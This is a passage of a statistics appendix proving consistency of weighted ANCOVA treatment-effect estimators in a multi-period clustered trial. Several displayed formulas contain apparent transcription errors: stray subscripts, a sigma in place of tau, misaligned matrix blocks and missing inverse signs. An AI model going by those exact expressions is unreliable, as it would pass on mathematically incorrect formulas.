\overline{wY(0)}_{j} \xrightarrow{p}\mu_{j}^{*}(0),\ \ \overline{w}_{j}\xrightarrow{p}\omega_{j}>0.\] Then the limiting value for the treatment effect in period \(j\) (\(I\rightarrow\infty\)) is \[\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{\omega_{j}}.\] Our goal is to show that \[\widehat{\tau}_{j}^{w}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac {\mu_{j}^{*}(0)}{\omega_{j}},\] then the consistency of \(\widehat{\tau}^{w}\) will follow. Assume \[\mathbf{S}_{\mathbf{X},j}=\frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\overline {\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\xrightarrow{p}\mathbf{\Sigma}_{ \mathbf{X},j},\] and \[\mathbf{S}_{\mathbf{X},Y,j}(z)=\frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}Y_{ijk}(z)\xrightarrow{p}\mathbf{\Sigma}_{\mathbf{X },Y,j}(z).\] Also, assume that we have finite limiting values on the variances for the potential outcomes, and as \(I\rightarrow\infty\), \[\frac{1}{I}\sum_{i=1}^{I}w_{ij}\overline{\mathbf{X}}_{ij}\xrightarrow{p}\overline {\mathbf{X}}_{j}^{*},\ \ \frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\mathbf{X}_{ijk}^{\prime}\mathbf{X}_{ ijk}\xrightarrow{p}\overline{\mathbf{X}^{\prime}\mathbf{X}}_{j}^{*},\] and \[\frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}Y_{ijk}(z)\xrightarrow{p}\overline{\mathbf{X}\mu_{j}^{*}}(z).\] The estimator is \[\left(\begin{array}{c}\widehat{\mathbf{\tau}}\\ \widehat{\mathbf{\beta}}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc|cccc}\frac{w_{y}^{0}w_{1}^{1}}{w_{ 1}}&&&&0&&&&\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&&\ddots&&\vdots\\ &&&\frac{w_{y}^{0}w_{1}^{1}}{w_{J}}&&&0&\frac{w_{y}^{0}w_{J}^{1}}{w_{J}}\left( \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline 0&&&&w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &0&&&w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{w_{y}^{0}w_{J}^{1}}{w_{ J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}&\mathbf{0}_{p} &\cdots&\mathbf{0}_{p}&\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\\ &\times\left(\begin{array}{c}\frac{w_{y}^{0}w_{1}^{1}}{w_{1}}\left( \overline{y}_{1}(1)-\overline{y}_{1}(0)\right)\\ \vdots\\ 
\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0)\right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\]
\[=\left(\begin{array}{ccc|ccc|c}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}&&&0&&&\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&&\ddots&&\vdots\\ &&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}&&&0&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline 0&&&\frac{1}{I}w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&&\ddots&&\vdots\\ &&0&&&\frac{1}{I}w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{1}{IJ}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{ijk}\end{array}\right)^{-1}\]
\[\times\left(\begin{array}{c}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)-\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0)\right)\\ \frac{1}{I}w_{1}\overline{Y}_{1}\\ \vdots\\ \frac{1}{I}w_{J}\overline{Y}_{J}\\ \frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right).\]
Also,
\[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{ijk}=\frac{1}{J}\sum_{j=1}^{J}\frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{ijk}\stackrel{p}{\rightarrow}\frac{1}{J}\sum_{j=1}^{J}\mathbf{\Sigma}_{\mathbf{X},j}=\mathbf{\Sigma}_{\mathbf{X}}.\]
Then,
\[\left(\begin{array}{ccc|ccc|c}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}&&&0&&&\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&&\ddots&&\vdots\\ &&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}&&&0&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline 0&&&\frac{1}{I}w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&&\ddots&&\vdots\\ &&0&&&\frac{1}{I}w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{1}{IJ}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{ijk}\end{array}\right)\]
\[\stackrel{p}{\rightarrow}\left(\begin{array}{ccc|ccc|c}e_{1}(1-e_{1})\omega_{1}&&&0&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&&\ddots&&\vdots\\ &&e_{J}(1-e_{J})\omega_{J}&&&0&\mathbf{0}_{p}^{\prime}\\ \hline 0&&&\omega_{1}&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&&\ddots&&\vdots\\ &&0&&&\omega_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X}}\end{array}\right).\]
By continuity of the inverse and Slutsky's theorem,
\[\left(\begin{array}{ccc|ccc|c}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}&&&0&&&\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right)\\ &\ddots&&&\ddots&&\vdots\\ &&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}&&&0&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline 0&&&\frac{1}{I}w_{1}&&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&&\ddots&&\vdots\\ &&0&&&\frac{1}{I}w_{J}&\mathbf{0}_{p}^{\prime}\\ \hline\frac{1}{IJ}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}^{\prime}_{ijk}\widetilde{\mathbf{X}}_{
ijk}\end{array}\right)^{-1}\] \[\stackrel{{ p}}{{\rightarrow}}\left(\begin{array}{cccc |cccc}\frac{1}{e_{1}(1-e_{1})\omega_{1}}&&0&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &&\frac{1}{e_{J}(1-e_{J})\omega_{J}}&&\frac{1}{\omega_{1}}&&\mathbf{0}_{p}^{ \prime}\\ &\ddots&&&\ddots&&\vdots\\ &0&&&\frac{1}{\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ &\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X}}^{\prime}\end{array} \right).\] Also, \[\frac{1}{I}\frac{w_{2}^{0}w_{j}^{1}}{w_{j}}\left(\overline{y}_{j}(1)-\overline {y}_{j}(0)\right)\stackrel{{ p}}{{\rightarrow}}e_{j}(1-e_{j}) \omega_{j}\left(\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{\omega_{ j}}\right)=e_{j}(1-e_{j})\left(\mu_{j}^{*}(1)-\mu_{j}^{*}(0)\right),\] and \[\frac{1}{I}w_{j}\overline{Y}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij} \overline{Y}_{ij} =e_{j}\frac{1}{I_{j}}\sum_{i=1}^{I}w_{ij}Z_{ij}\overline{Y}_{ij}(1)+(1-e_{j}) \frac{1}{I-I_{j}}\sum_{i=1}^{I}w_{ij}(1-Z_{ij})\overline{Y}_{ij}(0)\] \[\stackrel{{ p}}{{\rightarrow}}e_{j}\mu_{j}^{*}(1)+(1-e_{j}) \mu_{j}^{*}(0).\] By Theorem B of Scott and Wu (1981), \[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\] \[= \frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}Z_{ij} w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}Y_{ijk}(1)+\frac{1}{IJ}\sum_{i=1}^{I} \sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}(1-Z_{ij})w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}Y_{ijk}(0)\] \[\xrightarrow{p}\frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X },Y,j}(1)+\frac{1}{J}\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0).\] Therefore, \[\left(\begin{array}{c}\frac{1}{I}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left( \overline{y}_{1}(1)-\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline {y}_{J}(0)\right)\\ \frac{1}{I}w_{1}\overline{Y}_{1}\\ \vdots\\ \frac{1}{I}w_{J}\overline{Y}_{J}\\ \frac{1}{I}\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\xrightarrow{p}\left( \begin{array}{c}e_{1}(1-e_{1})\left(\mu_{1}^{*}(1)-\mu_{1}^{*}(0)\right)\\ \vdots\\ e_{J}(1-e_{J})\left(\mu_{J}^{*}(1)-\mu_{J}^{*}(0)\right)\\ e_{1}\mu_{1}^{*}(1)+(1-e_{1})\mu_{1}^{*}(0)\\ \vdots\\ e_{J}\mu_{J}^{*}(1)+(1-e_{J})\mu_{J}^{*}(0)\\ \frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)+\frac{1}{J}\sum_{j= 1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right).\] This leads to \[\left(\begin{array}{c}\widehat{\mathbf{\sigma}}\\ \widehat{\mathbf{\beta}}\\ \widehat{\mathbf{\gamma}}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccccc}\frac{1}{e_{1}(1-e_{1 })\omega_{1}}&&0&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &&\frac{1}{e_{J}(1-e_{J})\omega_{J}}&&0&\mathbf{0}_{p}^{\prime}\\ 0&&&\frac{1}{\omega_{1}}&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\ddots&&\vdots\\ &&0&&\frac{1}{\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X} }^{-1}\end{array}\right)\left(\begin{array}{c}e_{1}(1-e_{1})\left(\mu_{1}^{*} (1)-\mu_{1}^{*}(0)\right)\\ \vdots\\ e_{J}(1-e_{J})\left(\mu_{J}^{*}(1)-\mu_{J}^{*}(0)\right)\\ e_{1}\mu_{1}^{*}(1)+(1-e_{1})\mu_{1}^{*}(0)\\ \vdots\\ \frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)+\frac{1}{J}\sum_{j= 1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right)\] \[=\left(\begin{array}{c}\frac{1}{\omega_{1}}\left(\mu_{1}^{*}(1 
)-\mu_{1}^{*}(0)\right)\\ \vdots\\ \frac{1}{\omega_{j}}\left(\mu_{J}^{*}(1)-\mu_{J}^{*}(0)\right)\\ \frac{1}{\omega_{1}}\left(e_{1}\mu_{1}^{*}(1)+(1-e_{1})\mu_{1}^{*}(0)\right) \\ \vdots\\ \frac{1}{\omega_{J}}\left(e_{J}\mu_{J}^{*}(1)+(1-e_{J})\mu_{J}^{*}(0)\right) \end{array}\right),\] where \[\mathbf{\gamma}^{*}=\left(\sum_{j=1}^{J}\mathbf{\Sigma}_{\mathbf{X},j}\right)^{-1}\left( \sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)+\sum_{j=1}^{J}(1-e_{j})\mathbf{ \Sigma}_{\mathbf{X},Y,j}(0)\right).\] Thus, \[\widehat{\tau}_{j}^{w}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{ \mu_{j}^{*}(0)}{\omega_{j}}.\] #### Web Appendix A2.1.2 Ancova Ii For ANCOVA II, following similar arguments, we have \[\left(\begin{array}{c}\widehat{\tau}_{j}\\ \widehat{\beta}_{j}\\ \widehat{\mathbf{\gamma}}_{j}\end{array}\right)\] \[=\left(\begin{array}{cccc}\frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_ {j}}&0&\frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^ {1}-\overline{\mathbf{X}}_{j}^{0}\right)\\ 0&\frac{1}{I}w_{j}&\mathbf{0}_{p}^{0}\\ \frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}- \overline{\mathbf{X}}_{j}^{0}\right)^{\prime}&\mathbf{0}_{p}&\frac{1}{I}\sum_{i=1}^{I} \sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\overline{\mathbf{X}}_{ ijk}\end{array}\right)^{-1}\left(\begin{array}{c}\frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{1}} \left(\overline{\mathbf{y}}_{j}(1)-\overline{y}_{j}(0)\right)\\ \frac{1}{I}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}\overline{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccc}\frac{1}{e_{j}(1-e_{j}) \omega_{j}}&0&\mathbf{0}_{p}^{\prime}\\ 0&\frac{1}{\omega_{j}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\mathbf{0}_{p}&\mathbf{\Sigma}_{\mathbf{X},j}^{-1}\end{array}\right)\left( \begin{array}{c}e_{j}(1-e_{j})\left(\mu_{j}^{*}(1)-\mu_{j}^{*}(0)\right)\\ e_{j}\mathbf{\Sigma}_{\mathbf{X},j}(1)+(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},j}(0)\end{array}\right)\] \[=\left(\begin{array}{c}\frac{1}{\omega_{j}}\left(\mu_{j}^{*}(1 )-\mu_{j}^{*}(0)\right)\\ \frac{1}{\omega_{j}}\left(e_{j}\mu_{j}^{*}(1)+(1-e_{j})\mu_{j}^{*}(0)\right) \\ \mathbf{\gamma}_{j}^{*}\end{array}\right),\] where \[\mathbf{\gamma}_{j}^{*}=\mathbf{\Sigma}_{\mathbf{X},j}^{-1}\left(e_{j}\mathbf{\Sigma}_{\mathbf{X },Y,j}(1)+(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\right).\] Thus, \[\widehat{\tau}_{j}^{w}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac {\mu_{j}^{*}(0)}{\omega_{j}}.\] #### Web Appendix A2.1.3 Ancova Iii For the fully-interacted model without period-specific covariate effects, we have \[\left(\begin{array}{c}\widehat{\mathbf{\tau}}^{*}\\ \widehat{\mathbf{\eta}}^{*}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc}w_{1}^{1}&&&&&&&\frac{w_{1}^{0}w_{1 }^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\right) \\ &&\ddots&&\vdots\\ &&&w_{J}^{1}&\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}- \overline{\mathbf{X}}_{J}^{0}\right)\\ \hline\frac{w_{J}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{w_{J}^{0}w_{J}^{1}}{w_{J }}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime} \end{array}\right)\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\right)\] \[\times\left(\begin{array}{c}w_{1}^{1}\overline{y}_{1}(1)\\ \vdots\\ 
w_{J}^{1}\overline{y}_{J}(1)\\ \sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde {\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc}\frac{1}{I}w_{1}^{1}&&&&&&&\frac{1 }{I}\frac{w_{J}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)\\ \ddots&&&&&\vdots\\ \frac{1}{I}w_{J}^{1}&&\frac{1}{I}\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline {\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline\frac{1}{IJ}\frac{w_{J}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{1}{IJ}\frac{w_{J}^{0}w_ {J}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0} \right)^{\prime}\end{array}\right)\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ ij}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ ijk}\right)\] \[\times\left(\begin{array}{c}\frac{1}{I}w_{1}^{1}\overline{y}_{1}(1) \\ \vdots\\ \frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\] Since, \[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\xrightarrow{p}\frac{1}{J} \sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},j},\] and \[\frac{1}{IJ}\sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}Y_{ijk}\xrightarrow{p}\frac{1}{J}\sum_{j=1}^{ J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1),\] we have \[\left(\begin{array}{c}\widehat{\mathbf{\tau}}^{*}\\ \widehat{\mathbf{\eta}}^{*}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccc}\frac{1}{e_{1}\omega_{1} }&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\vdots\\ &&\frac{1}{e_{J}\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\left(\frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_ {\mathbf{X},j}\right)^{-1}\end{array}\right)\left(\begin{array}{c}e_{1}\mu_{1}^ {*}(1)\\ \vdots\\ e_{J}\mu_{J}^{*}(1)\\ \frac{1}{J}\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)\end{array}\right)= \left(\begin{array}{c}\frac{1}{\omega_{1}}\mu_{1}^{*}(1)\\ \vdots\\ \frac{1}{\omega_{J}}\mu_{J}^{*}(1)\\ \mathbf{\eta}^{**}\end{array}\right),\] where \[\mathbf{\eta}^{**}=\left(\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},j} \right)^{-1}\left(\sum_{j=1}^{J}e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)\right).\] Thus, \[\widehat{\tau}_{j}^{*}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{ \omega_{j}}.\] Similarly, \[\left(\begin{array}{c}\widehat{\mathbf{\beta}}\\ \widehat{\mathbf{\gamma}}\end{array}\right)\] \[\xrightarrow{p}\left(\begin{array}{ccc}\frac{1}{(1-e_{1}) \omega_{1}}&&\mathbf{0}_{p}^{\prime}\\ &\ddots&&\vdots\\ &&\frac{1}{(1-e_{J})\omega_{J}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&\cdots&\mathbf{0}_{p}&\left(\frac{1}{J}\sum_{j=1}^{J}(1-e_{j})\mathbf{ \Sigma}_{\mathbf{X},j}\right)^{-1}\end{array}\right)\left(\begin{array}{c}(1-e_ {1})\mu_{1}^{*}(0)\\ \vdots\\ (1-e_{J})\mu_{J}^{*}(0)\\ \frac{1}{J}\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right) =\left(\begin{array}{c}\frac{1}{\omega_{1}}\mu_{1}^{*}(0)\\ \vdots\\ \frac{1}{\omega_{J}}\mu_{J}^{*}(0)\\ \mathbf{\gamma}^{*}\end{array}\right),\] where \[\mathbf{\gamma}^{*}=\left(\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X}, j}\right)^{-1}\left(\sum_{j=1}^{J}(1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\right).\] Thus, \[\widehat{\beta}_{j}\xrightarrow{p}\frac{\mu_{j}^{*}(0)}{ \omega_{j}},\] and we 
have
\[\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{\omega_{j}}.\]

#### Web Appendix A2.1.4 ANCOVA IV

For the fully-interacted model with period-varying covariate effects, we have
\[\left(\begin{array}{c}\widehat{\tau}_{j}^{*}\\ \widehat{\mathbf{\eta}}_{j}^{*}\end{array}\right)=\left(\begin{array}{cc}w_{j}^{1}&\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)^{\prime}&\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right)^{-1}\left(\begin{array}{c}w_{j}^{1}\overline{y}_{j}(1)\\ \sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\]
\[=\left(\begin{array}{cc}\frac{1}{I}w_{j}^{1}&\frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)\\ \frac{1}{I}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)^{\prime}&\frac{1}{I}\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right)^{-1}\left(\begin{array}{c}\frac{1}{I}w_{j}^{1}\overline{y}_{j}(1)\\ \frac{1}{I}\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\end{array}\right)\]
